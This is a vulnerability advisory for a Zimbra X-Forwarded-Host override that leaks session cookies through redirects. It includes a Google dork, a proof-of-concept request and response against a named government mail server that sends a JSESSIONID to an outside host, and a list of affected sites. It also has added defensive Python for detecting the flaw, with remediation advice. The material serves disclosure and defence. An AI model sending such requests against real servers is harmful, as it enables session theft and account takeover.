#############################################################
# Exploit Title: Zimbra - Request URL Override Vulnerability
# Exploit Author: Gh05t666nero
# Author Team: The A Team - Kejaksaan Agung
# Google Dork: inurl:/public/launchSidebar.jsp
# Software Vendor: Zimbra
# Software Version: *
# Software Link: https://www.zimbra.com/downloads
# Date: 2022-05-09
#############################################################
[*] About:
----------
Zimbra Collaboration, formerly known as the Zimbra Collaboration Suite (ZCS) before 2019, is a collaborative software suite that includes an email server and a web client.
#############################################################
[*] Detail:
-----------
Some applications and frameworks support HTTP headers that can be used to override parts of the request URL, potentially affecting the routing and processing of the request.
Intermediate systems are often oblivious to these headers. In the case of reverse proxies and web application firewalls, this can lead to security rulesets being bypassed. If a caching system is in place, this may enable cache poisoning attacks. These headers may also enable forging of log entries.
Even if the application is intended to be accessed directly, some visitors may be using a corporate proxy enabling localised cache poisoning.
The application appears to support the use of a custom HTTP header to override the Host header.
The attacker added the following header to the request:
X-Forwarded-Host: cxsecurity.com
The value of this header was reflected in the response, showing that the header was processed.
#############################################################
[*] Impact:
-----------
This Zimbra vulnerability leaks users' session cookies by redirecting them to a malicious site, allowing attackers to take over accounts via the leaked session (see the value of the response header "location").
#############################################################
[*] Remediation:
----------------
To fully resolve this issue, locate the component that processes the affected headers, and disable it entirely. If you are using a framework, applying any pending security updates may do this for you.
If this isn't practical, an alternative workaround is to configure an intermediate system to automatically strip the affected headers before they are processed.
#############################################################
[*] PoC:
--------
# Request:
GET /public/launchSidebar.jsp HTTP/2
Host: mail.polri.go.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: ZM_TEST=true; ZM_LOGIN_CSRF=4ada1b4f-e1b2-42de-940e-5ecfb2a02148
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
X-Forwarded-Host: cxsecurity.com
Pragma: no-cache
Cache-Control: no-cache
TE: trailers
# Response:
HTTP/2 302 Found
server: nginx
date: Mon, 09 May 2022 04:48:53 GMT
content-type: text/html;charset=utf-8
content-length: 0
strict-transport-security: max-age=31536000
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-robots-tag: noindex
x-frame-options: SAMEORIGIN
expires: Thu, 01 Jan 1970 00:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, max-age=0
pragma: no-cache
set-cookie: JSESSIONID=node0foto54zfs581as22ufve2d6p53332.node0;Path=/
location: http://cxsecurity.com/;jsessionid=node0foto54zfs581as22ufve2d6p53332.node0?loginOp=relogin&client=socialfox&loginErrorCode=service.AUTH_REQUIRED
X-Firefox-Spdy: h2
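The following is an added example written for this page; it is not part of the original advisory and not Zimbra code. It covers the Detail, Remediation and PoC sections from the defender's side: the first helper parses a raw request/response pair and reports when the redirect host in "location" was taken from an override header rather than from Host; the second shows the server-side fix of keeping redirects on an allow-listed host. The sample exchange is constructed to mirror the PoC above, with placeholder hosts and session id; the list of override header names and the helper names are the editor's assumptions, the advisory itself only names X-Forwarded-Host.

```python
from urllib.parse import urlsplit, urlunsplit

# Request headers that some frameworks honour as a Host override (assumption:
# this list is the editor's; the advisory itself only names X-Forwarded-Host).
OVERRIDE_HEADERS = ("x-forwarded-host", "x-host", "x-forwarded-server",
                    "x-http-host-override")

# Constructed sample exchange modelled on the advisory's PoC; the hosts and the
# session id are placeholders, not values from the original request.
SAMPLE_REQUEST = """GET /public/launchSidebar.jsp HTTP/2
Host: mail.example.invalid
User-Agent: Mozilla/5.0
X-Forwarded-Host: attacker.example
"""

SAMPLE_RESPONSE = """HTTP/2 302 Found
server: nginx
content-length: 0
set-cookie: JSESSIONID=PLACEHOLDER_SESSION_ID;Path=/
location: http://attacker.example/;jsessionid=PLACEHOLDER_SESSION_ID?loginOp=relogin&client=socialfox&loginErrorCode=service.AUTH_REQUIRED
"""


def parse_headers(raw):
    """Split a raw HTTP message into (start line, {lowercase name: value})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # a blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def host_only(value):
    """Strip any :port suffix and lowercase, so host comparisons are exact."""
    return value.split(":")[0].strip().lower()


def find_host_override(request_raw, response_raw):
    """Return the name of the override header whose value ended up as the
    redirect host, or None when there is no redirect or the Location host
    matches the real Host header."""
    _, req = parse_headers(request_raw)
    _, resp = parse_headers(response_raw)
    location = resp.get("location")
    if not location:
        return None
    target = urlsplit(location).hostname  # None for a relative redirect
    if target is None or target == host_only(req.get("host", "")):
        return None  # relative redirect, or redirect stays on the real host
    for name in OVERRIDE_HEADERS:
        if name in req and host_only(req[name]) == target:
            return name
    return None


def enforce_redirect_host(location, allowed_hosts, canonical_host):
    """Server-side mitigation: keep absolute redirects on an allow-listed host
    and rewrite anything else to the canonical host. Relative redirects pass."""
    parts = urlsplit(location)
    if parts.hostname is None or parts.hostname.lower() in allowed_hosts:
        return location
    return urlunsplit((parts.scheme, canonical_host, parts.path,
                       parts.query, parts.fragment))


if __name__ == "__main__":
    hit = find_host_override(SAMPLE_REQUEST, SAMPLE_RESPONSE)
    print("override header reflected into Location:", hit)
    original = parse_headers(SAMPLE_RESPONSE)[1]["location"]
    fixed = enforce_redirect_host(original, {"mail.example.invalid"},
                                  "mail.example.invalid")
    print("rewritten Location:", fixed)
```

Running the script against the constructed sample reports "x-forwarded-host" and rewrites the redirect back onto mail.example.invalid while preserving the path and query. The detection helper can be pointed at recorded proxy traffic to confirm whether a reverse proxy in front of Zimbra is already stripping the header; for the intermediate-system workaround from the Remediation section, nginx's `proxy_set_header X-Forwarded-Host $host;` replaces any client-supplied value with the real Host before the request reaches the application.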
#############################################################
[*] Affected:
--------------
https://mail.polri.go.id/public/launchSidebar.jsp
https://mail.kejaksaan.go.id/public/launchSidebar.jsp
And other vital Indonesian websites.